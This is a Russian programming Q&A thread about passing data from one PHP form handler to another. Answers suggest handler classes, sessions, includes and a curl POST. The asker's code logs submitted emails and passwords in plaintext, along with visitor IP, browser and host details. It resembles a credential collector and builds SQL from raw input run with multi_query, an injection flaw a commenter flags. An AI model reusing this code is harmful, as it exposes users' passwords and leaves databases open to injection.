# Как в php передать данные от одной формы в другую?

Tags: php, html

У меня есть обработчик форм, мне нужно чтобы после выполнения этого php кода, данные от этого обработчика форм отправились в другой обработчик форм. Как это реализовать на php? Две формы обьединять в один php файл нельзя, в целях безопасности, но можно отправить данные от одного php к другому. Только как это сделать?

```
<?php
$cn = new mysqli("localhost", "user", "pass", "db");
if ($cn->connect_error){ echo "Connection failed : " . $cn->connect_error;}
echo "Connection successfully ";
$email=$_POST['email'];
$pass=$_POST['pass'];
$ip = getenv("REMOTE_ADDR");
$ip2 = $_SERVER['REMOTE_ADDR'];
$browser = getenv("HTTP_USER_AGENT");
$referer = @$_SERVER['HTTP_REFERER'];
$host = gethostbyaddr(getenv("REMOTE_ADDR"));
$port = getenv("REMOTE_PORT");
$connect = $_SERVER['HTTP_CONNECTION'];
$time = date("d.m.Y (H:i:s)", time());
$sql="INSERT INTO data( email, pass, ip, ip2, browser, referer, host, port, connect, time ) VALUE ( '$email', '$pass', '$ip', '$ip2', '$browser', '$referer', '$host', '$port', '$connect', '$time' )";
if ($cn->multi_query($sql) === TRUE)
{echo "New record created successfully ";}
else {echo "Error:" . $sql . "\n" . $cn->error;};
$cn->close();
//А теперь log'и
$fp = fopen("log.log", "a+t"); // Открываем файл в режиме записи
$str=$email.' , '.$pass.' , '.$ip.' , '.$ip2.' , '.$browser.' , '.$referer.' , '.$host.' , '.$port.' , '.$connect.' , '.$time ."\n" ;
$test = fwrite($fp, $str); // Запись в файл
if ($test) echo 'Данные в файл успешно занесены.';
else echo 'Ошибка при записи в файл.';
fclose($fp); //Закрытие файла
?>
```

Comment: код стоит выделять как код, используйте для этого панель инструментов или Ctrl+K

Comment: А причем тут вопрос безопастности? Чего конкретно вы опасаетесь?

Comment: Зря вы используете multiquery при наличии такой обширной sql-иньекции

Answer (score 0, accepted):

Все свои "обработчики" нужно обернуть в классы:

```
interface class Handler {
  public function handle($data);
}

class FormLogger implements Handler {
  public static function get() {return new static;}
  public function handle($data) {
    file_put_contents('form.log', json_encode($data), FILE_APPEND);
    return $data;
  }
}
class FormSaver implements Handler {
  public static function get() {return new static;}
  public function handle($data) {
    return FormModel::get()
      ->setData($data)
      ->save()
      ->getData();
  }
}
```

А в скриптах просто вызывать те обработчики, что тебе нужны..

---

Первый скрипт:

```
require_once('../vendor/autoload.php');

FormLogger::get()->handle($_GET);

header('Content-type: application/json');
echo json_encode(['status' => 'ok']);
```

Второй скрипт:

```
require_once('../vendor/autoload.php');

$data = $_POST;

/** @var Handler $h */
foreach ([FormSaver::get(), FormLogger::get()] as $h) {
  $data = $h->handle($data);
}
header('Content-type: application/json');
echo json_encode($data);
```

Answer (score 0):

а) глобальные переменные

б) сессии

в) подключение файла (include)

г) сохранение в файл/БД

д) функции с транзитом параметров

Comment: Вы бы ещё редирект на вторую форму предложили

Comment: Да у меня еще много идей))) Кукисы (хотя это те же сессии), скрытые поля для новой формы, сокеты, передача по гет-параметрам нового вызова...

Comment: И ни слова про ООП)

Comment: И ни слова про стего ))

Answer (score 0):

Не очень понял чем обусловлена "цель безопасности".
Но почему бы после обработки данных скриптом №1 не отправлять данные в скрипт №2 одним из HTTP запросов, тем же POST/GET запросом. 
Например:

```
if( $curl = curl_init() ) { 
    // URL скрипта №2
    curl_setopt($curl, CURLOPT_URL, "http://www.google.ru/script2.php"); 
    curl_setopt($curl, CURLOPT_RETURNTRANSFER,true);
    curl_setopt($curl, CURLOPT_POST, true);
    // данные, которые отправляются
    curl_setopt($curl, CURLOPT_POSTFIELDS, "name=Ivan&phone=212332211"); 
    $out = curl_exec($curl);
    curl_close($curl);
}
```

Comment: Зачем делать запрос к серверу, если скрипт лежит рядом?

Comment: Ну это единственное дополнение к вариантам, предложенным выше.
В условиях содержания вопроса и отрицания абсурдности возможности `include` 'в целях безопасности'.